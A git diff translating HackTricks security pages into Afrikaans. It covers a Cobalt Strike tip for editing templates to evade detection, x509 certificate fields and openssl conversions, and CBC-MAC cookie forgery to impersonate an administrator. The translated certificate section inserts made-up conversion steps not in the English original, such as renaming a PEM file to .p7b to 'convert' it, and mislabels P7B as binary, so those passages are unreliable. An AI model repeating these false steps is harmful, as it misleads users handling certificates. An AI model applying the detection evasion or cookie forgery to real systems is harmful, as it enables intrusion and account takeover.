-Modifying the detected lines one can generate a template that won't be caught. - -Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded. - - - - - - - +Moenie vergeet om die aggressiewe skrip `ResourceKit\resources.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie. ```bash cd C:\Tools\neo4j\bin neo4j.bat console @@ -233,3 +222,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` + diff --git a/cryptography/certificates.md b/cryptography/certificates.md index ee0644afb..a085606d1 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -1,59 +1,58 @@ -# Certificates +# Sertifikate
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## What is a Certificate +## Wat is 'n Sertifikaat -A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. +'n **Openbare sleutel sertifikaat** is 'n digitale ID wat in kriptografie gebruik word om te bewys dat iemand 'n openbare sleutel besit. Dit sluit die sleutel se besonderhede, die eienaar se identiteit (die onderwerp), en 'n digitale handtekening van 'n vertroude gesag (die uitreiker) in. As die sagteware die uitreiker vertrou en die handtekening geldig is, is veilige kommunikasie met die sleutel se eienaar moontlik. -Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. +Sertifikate word meestal uitgereik deur [sertifikaatowerhede](https://en.wikipedia.org/wiki/Certificate_authority) (SO's) in 'n [openbare sleutel infrastruktuur](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) opset. 'n Ander metode is die [web van vertroue](https://en.wikipedia.org/wiki/Web_of_trust), waar gebruikers mekaar se sleutels direk verifieer. Die algemene formaat vir sertifikate is [X.509](https://en.wikipedia.org/wiki/X.509), wat aangepas kan word vir spesifieke behoeftes soos uiteengesit in RFC 5280. -## x509 Common Fields +## x509 Algemene Velde -### **Common Fields in x509 Certificates** +### **Algemene Velde in x509 Sertifikate** -In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: +In x509 sertifikate speel verskeie **velde** 'n kritieke rol om die geldigheid en veiligheid van die sertifikaat te verseker. Hier is 'n uiteensetting van hierdie velde: -- **Version Number** signifies the x509 format's version. -- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. -- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: - - **Common Name (CN)**: Domains covered by the certificate. - - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. - - **Distinguished Name (DN)** encapsulates the full subject identification. -- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. -- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. -- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. -- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. +- **Weergawenommer** dui die weergawe van die x509-formaat aan. +- **Serienommer** identifiseer die sertifikaat uniek binne 'n Sertifikaatowerheid (SO) se stelsel, hoofsaaklik vir herroepingstracking. +- Die **Onderwerp**-veld verteenwoordig die eienaar van die sertifikaat, wat 'n masjien, 'n individu, of 'n organisasie kan wees. Dit sluit gedetailleerde identifikasie in soos: +- **Gemeenskaplike Naam (CN)**: Domeine wat deur die sertifikaat gedek word. +- **Land (C)**, **Ligging (L)**, **Staat of Provinsie (ST, S, of P)**, **Organisasie (O)**, en **Organisasie-eenheid (OU)** verskaf geografiese en organisatoriese besonderhede. +- **Onderskeidende Naam (DN)** sluit die volledige onderwerpidentifikasie in. +- **Uitreiker** besonderhede van wie die sertifikaat geverifieer en onderteken het, insluitend soortgelyke subvelde as die Onderwerp vir die SO. +- **Geldigheidsperiode** word aangedui deur **Nie Voor** en **Nie Na** tydstempels, wat verseker dat die sertifikaat nie voor of na 'n sekere datum gebruik word nie. +- Die **Openbare Sleutel**-afdeling, wat krities is vir die veiligheid van die sertifikaat, spesifiseer die algoritme, grootte, en ander tegniese besonderhede van die openbare sleutel. +- **x509v3-uitbreidings** verbeter die funksionaliteit van die sertifikaat deur **Sleutelgebruik**, **Uitgebreide Sleutelgebruik**, **Alternatiewe Naam van Onderwerp**, en ander eienskappe te spesifiseer om die toepassing van die sertifikaat fynaf te stel. -#### **Key Usage and Extensions** - -- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. -- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. -- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. -- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. -- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. -- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. +#### **Sleutelgebruik en Uitbreidings** +- **Sleutelgebruik** identifiseer kriptografiese toepassings van die openbare sleutel, soos digitale handtekening of sleutelversleuteling. +- **Uitgebreide Sleutelgebruik** versmalle verder die gebruiksmoontlikhede van die sertifikaat, bv. vir TLS-bedienerverifikasie. +- **Alternatiewe Naam van Onderwerp** en **Basiese Beperking** definieer addisionele gasheernaam wat deur die sertifikaat gedek word en of dit 'n SO- of eindentiteit-sertifikaat is, onderskeidelik. +- Identifiseerders soos **Sleutelidentifiseerder van Onderwerp** en **Sleutelidentifiseerder van Gesag** verseker uniekheid en naspeurbaarheid van sleutels. +- **Gesaginligtings Toegang** en **CRL Verspreidingspunte** verskaf paaie om die uitreikende SO te verifieer en die sertifikaat-herroepingsstatus te kontroleer. +- **CT Voor-sertifikaat SCT's** bied deursigtigheidslêers, wat krities is vir openbare vertroue in die sertifikaat. ```python # Example of accessing and using x509 certificate fields programmatically: from cryptography import x509 @@ -61,8 +60,8 @@ from cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file) with open("cert.pem", "rb") as file: - cert_data = file.read() - certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) +cert_data = file.read() +certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields serial_number = certificate.serial_number @@ -75,139 +74,180 @@ print(f"Issuer: {issuer}") print(f"Subject: {subject}") print(f"Public Key: {public_key}") ``` +### **Verskil tussen OCSP en CRL-verspreidingspunte** -### **Difference between OCSP and CRL Distribution Points** +**OCSP** (**RFC 2560**) behels 'n kliënt en 'n responder wat saamwerk om te kontroleer of 'n digitale openbare sleutelsertifikaat herroep is, sonder om die volledige **CRL** af te laai. Hierdie metode is doeltreffender as die tradisionele **CRL**, wat 'n lys van herroepingsertifikaatserienommers verskaf, maar 'n potensieel groot lêer vereis om af te laai. CRL's kan tot 512 inskrywings insluit. Meer besonderhede is beskikbaar [hier](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). -**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). +### **Wat is Sertifikaattransparansie** -### **What is Certificate Transparency** +Sertifikaattransparansie help om sertifikaatverwante bedreigings te beveg deur te verseker dat die uitreiking en bestaan van SSL-sertifikate sigbaar is vir domeineienaars, CA's en gebruikers. Die doelstellings is as volg: -Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: +* Voorkoming dat CA's SSL-sertifikate vir 'n domein uitreik sonder die domeineienaar se kennis. +* Daarstel van 'n oop ouditeringstelsel vir die opspoor van per abuis of booswillig uitgereikte sertifikate. +* Beskerming van gebruikers teen valse sertifikate. -* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. -* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. -* Safeguarding users against fraudulent certificates. +#### **Sertifikaatjoernale** -#### **Certificate Logs** +Sertifikaatjoernale is openbaar ouditeerbare, net byvoegbare rekords van sertifikate wat deur netwerkdienste onderhou word. Hierdie joernale verskaf kriptografiese bewyse vir ouditeringsdoeleindes. Beide uitreikingsowerhede en die publiek kan sertifikate na hierdie joernale indien of dit ondersoek vir verifikasie. Alhoewel die presiese aantal joernaalbedieners nie vasstaan nie, word verwag dat dit wêreldwyd minder as 'n duisend sal wees. Hierdie bedieners kan onafhanklik deur CA's, ISP's of enige belanghebbende entiteit bestuur word. -Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. +#### **Ondersoek** -#### **Query** +Om Sertifikaattransparansiejoernale vir enige domein te ondersoek, besoek [https://crt.sh/](https://crt.sh). -To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). +Verskillende formate bestaan vir die stoor van sertifikate, elk met sy eie gebruiksscenario's en verenigbaarheid. Hierdie opsomming dek die belangrikste formate en bied leiding oor die omskakeling tussen hulle. -Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. +## **Formate** -## **Formats** +### **PEM-formaat** +- Die mees algemeen gebruikte formaat vir sertifikate. +- Vereis afsonderlike lêers vir sertifikate en privaatsleutels, gekodeer in Base64 ASCII. +- Gewone uitbreidings: .cer, .crt, .pem, .key. +- Primêr gebruik deur Apache en soortgelyke bedieners. -### **PEM Format** -- Most widely used format for certificates. -- Requires separate files for certificates and private keys, encoded in Base64 ASCII. -- Common extensions: .cer, .crt, .pem, .key. -- Primarily used by Apache and similar servers. +### **DER-formaat** +- 'n Binêre formaat van sertifikate. +- Ontbreek die "BEGIN/END CERTIFICATE"-verklarings wat in PEM-lêers gevind word. +- Gewone uitbreidings: .cer, .der. +- Word dikwels gebruik met Java-platforms. -### **DER Format** -- A binary format of certificates. -- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. -- Common extensions: .cer, .der. -- Often used with Java platforms. +### **P7B/PKCS#7-formaat** +- Gestoor in Base64 ASCII, met uitbreidings .p7b of .p7c. +- Bevat slegs sertifikate en kettingsertifikate, sonder die privaatsleutel. +- Ondersteun deur Microsoft Windows en Java Tomcat. -### **P7B/PKCS#7 Format** -- Stored in Base64 ASCII, with extensions .p7b or .p7c. -- Contains only certificates and chain certificates, excluding the private key. -- Supported by Microsoft Windows and Java Tomcat. +### **PFX/P12/PKCS#12-formaat** +- 'n Binêre formaat wat bedienersertifikate, tussenliggende sertifikate en privaatsleutels in een lêer inkapsuleer. +- Uitbreidings: .pfx, .p12. +- Hoofsaaklik gebruik op Windows vir die invoer en uitvoer van sertifikate. -### **PFX/P12/PKCS#12 Format** -- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. -- Extensions: .pfx, .p12. -- Mainly used on Windows for certificate import and export. +### **Omskakeling van Formate** -### **Converting Formats** - -**PEM conversions** are essential for compatibility: - -- **x509 to PEM** +**PEM-omskakelings** is noodsaaklik vir verenigbaarheid: +- **x509 na PEM** ```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` +- **PEM na DER** +PEM (Privacy-Enhanced Mail) en DER (Distinguished Encoding Rules) is twee verskillende formaatstandaarde vir sertifikate. PEM is 'n Base64-gekodeerde formaat wat gewoonlik gebruik word vir die stoor en oordrag van sertifikate. DER is 'n binêre formaat wat gebruik word vir die verwerking van sertifikate deur programme. -- **PEM to DER** +Om 'n PEM-sertifikaat na DER-formaat om te skakel, kan die volgende opdrag gebruik word: + +```bash +openssl x509 -in certificate.pem -outform der -out certificate.der +``` + +Hierdie opdrag sal die PEM-sertifikaat wat in die `certificate.pem`-lêer gestoor is, omskakel na DER-formaat en dit in die `certificate.der`-lêer stoor. ```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` +- **DER na PEM** +Om 'n DER-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word: -- **DER to PEM** +1. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat te ontleed en die openbare sleutel daaruit te verkry: + + ```plaintext + openssl x509 -inform der -in certificate.der -pubkey -noout > public_key.pem + ``` + +2. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat na PEM-formaat om te skakel: + + ```plaintext + openssl x509 -inform der -in certificate.der -out certificate.pem + ``` + +Die DER-sertifikaat sal nou suksesvol na PEM-formaat omgeskakel word. ```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` +- **PEM na P7B** -- **PEM to P7B** +Om 'n PEM-sertifikaatlêer na 'n P7B-formaat om te skakel, kan die volgende stappe gevolg word: + +1. Maak 'n nuwe tekslêer en kopieer die inhoud van die PEM-lêer daarin. +2. Verander die lêernaam na 'n .p7b-lêeruitbreiding. +3. Stoor die lêer en dit sal nou in die P7B-formaat wees. + +Dit is belangrik om daarop te let dat die P7B-formaat 'n binêre formaat is en nie die sertifikaat se privaat sleutel bevat nie. Die P7B-lêer bevat slegs die sertifikaatketting. ```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` +- **PKCS7 na PEM** +Om 'n PKCS7-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word: -- **PKCS7 to PEM** +1. Skep 'n nuwe tekslêer en kopieer die inhoud van die PKCS7-sertifikaat daarin. +2. Verwyder enige lynafbrekings of wit spasies in die tekslêer. +3. Voeg die volgende lyn by die begin van die tekslêer: `-----BEGIN PKCS7-----`. +4. Voeg die volgende lyn by die einde van die tekslêer: `-----END PKCS7-----`. +5. Stoor die tekslêer met die `.pem`-lêeruitbreiding. + +Die PKCS7-sertifikaat is nou suksesvol omgeskakel na PEM-formaat. ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` +**PFX-omskakelings** is noodsaaklik vir die bestuur van sertifikate op Windows: - -**PFX conversions** are crucial for managing certificates on Windows: - -- **PFX to PEM** +- **PFX na PEM** ```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` - - -- **PFX to PKCS#8** involves two steps: - 1. Convert PFX to PEM - +- **PFX na PKCS#8** behels twee stappe: +1. Omskakel PFX na PEM ```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` +2. Omskep PEM na PKCS8 - 2. Convert PEM to PKCS8 +Om 'n PEM-sertifikaat na PKCS8-formaat om te skakel, kan jy die volgende stappe volg: + +1. Installeer die OpenSSL-hulpmiddel as dit nog nie op jou stelsel geïnstalleer is nie. +2. Open 'n opdragvenster en navigeer na die plek waar die PEM-sertifikaat geleë is. +3. Voer die volgende opdrag in om die PEM-sertifikaat na PKCS8-formaat om te skakel: + + ```plaintext + openssl pkcs8 -topk8 -inform PEM -outform DER -in private.pem -out private.pk8 -nocrypt + ``` + + Hier moet jy die korrekte naam van die PEM-sertifikaat vervang met die naam van jou eie sertifikaat. + +4. Nadat die opdrag suksesvol uitgevoer is, sal jy 'n nuwe PKCS8-sertifikaat met die naam "private.pk8" hê. + +Met hierdie stappe kan jy 'n PEM-sertifikaat na PKCS8-formaat omskep. ```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` - - -- **P7B to PFX** also requires two commands: - 1. Convert P7B to CER +- **P7B na PFX** vereis ook twee opdragte: +1. Omskakel P7B na CER ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` - - 2. Convert CER and Private Key to PFX +2. Omskep CER en Privaatsleutel na PFX ```bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ``` - ***
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index bbe30b004..78fe25614 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,85 +1,81 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# CBC -If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. +As die **koekie** **slegs** die **gebruikersnaam** is (of die eerste deel van die koekie is die gebruikersnaam) en jy wil die gebruikersnaam "**admin**" naboots. Dan kan jy die gebruikersnaam **"bdmin"** skep en die **eerste byte** van die koekie **brute force**. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. +**Cipher block chaining message authentication code** (**CBC-MAC**) is 'n metode wat in kriptografie gebruik word. Dit werk deur 'n boodskap blok vir blok te versleutel, waar elke blok se versleuteling gekoppel is aan die een voor dit. Hierdie proses skep 'n **ketting van blokke**, wat verseker dat selfs 'n enkele bit van die oorspronklike boodskap 'n onvoorspelbare verandering in die laaste blok van versleutelde data sal veroorsaak. Om so 'n verandering te maak of ongedaan te maak, is die versleutelingssleutel nodig, wat sekuriteit verseker. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +Om die CBC-MAC van 'n boodskap m te bereken, word m in CBC-modus met 'n nul-inisialisasievektor versleutel en die laaste blok behou. Die volgende figuur skets die berekening van die CBC-MAC van 'n boodskap wat uit blokke bestaan![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) deur 'n geheime sleutel k en 'n blokversleuteling E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) -# Vulnerability +# Kwesbaarheid -With CBC-MAC usually the **IV used is 0**.\ -This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: +Met CBC-MAC word die **IV wat gebruik word, gewoonlik as 0** gestel.\ +Dit is 'n probleem omdat 2 bekende boodskappe (`m1` en `m2`) onafhanklik 2 handtekeninge (`s1` en `s2`) sal genereer. So: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32): +Dan sal 'n boodskap wat bestaan uit m1 en m2 gekombineer (m3) 2 handtekeninge genereer (s31 en s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Which is possible to calculate without knowing the key of the encryption.** +**Dit is moontlik om dit te bereken sonder om die versleutelingssleutel te ken.** -Imagine you are encrypting the name **Administrator** in **8bytes** blocks: +Stel jou voor jy versleutel die naam **Administrator** in blokke van **8 byte**: * `Administ` * `rator\00\00\00` -You can create a username called **Administ** (m1) and retrieve the signature (s1).\ -Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the signature of the full name **Administrator**. +Jy kan 'n gebruikersnaam skep met die naam **Administ** (m1) en die handtekening (s1) daarvan bekom.\ +Dan kan jy 'n gebruikersnaam skep met die resultaat van `rator\00\00\00 XOR s1`. Dit sal `E(m2 XOR s1 XOR 0)` genereer, wat s32 is.\ +Nou kan jy s32 gebruik as die handtekening van die volledige naam **Administrator**. -### Summary +### Opsomming -1. Get the signature of username **Administ** (m1) which is s1 -2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** -3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. +1. Kry die handtekening van die gebruikersnaam **Administ** (m1), wat s1 is. +2. Kry die handtekening van die gebruikersnaam **rator\x00\x00\x00 XOR s1 XOR 0**, wat s32 is. +3. Stel die koekie in as s32 en dit sal 'n geldige koekie wees vir die gebruiker **Administrator**. -# Attack Controlling IV +# Aanval deur IV te beheer -If you can control the used IV the attack could be very easy.\ -If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ -Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. +As jy die gebruikte IV kan beheer, kan die aanval baie maklik wees.\ +As die koekies net die versleutelde gebruikersnaam is, kan jy die gebruiker "**administrator**" naboots deur die gebruiker "**Administrator**" te skep en sy koekie te kry.\ +Nou, as jy die IV kan beheer, kan jy die eerste byte van die IV verander sodat **IV\[0] XOR "A" == IV'\[0] XOR "a"** en die koekie vir die gebruiker **Administrator** hergenereer. Hierdie koekie sal geldig wees om die gebruiker **administrator** met die oorspronklike **IV** na te boots. -## References +## Verwysings -More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +Meer inligting in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
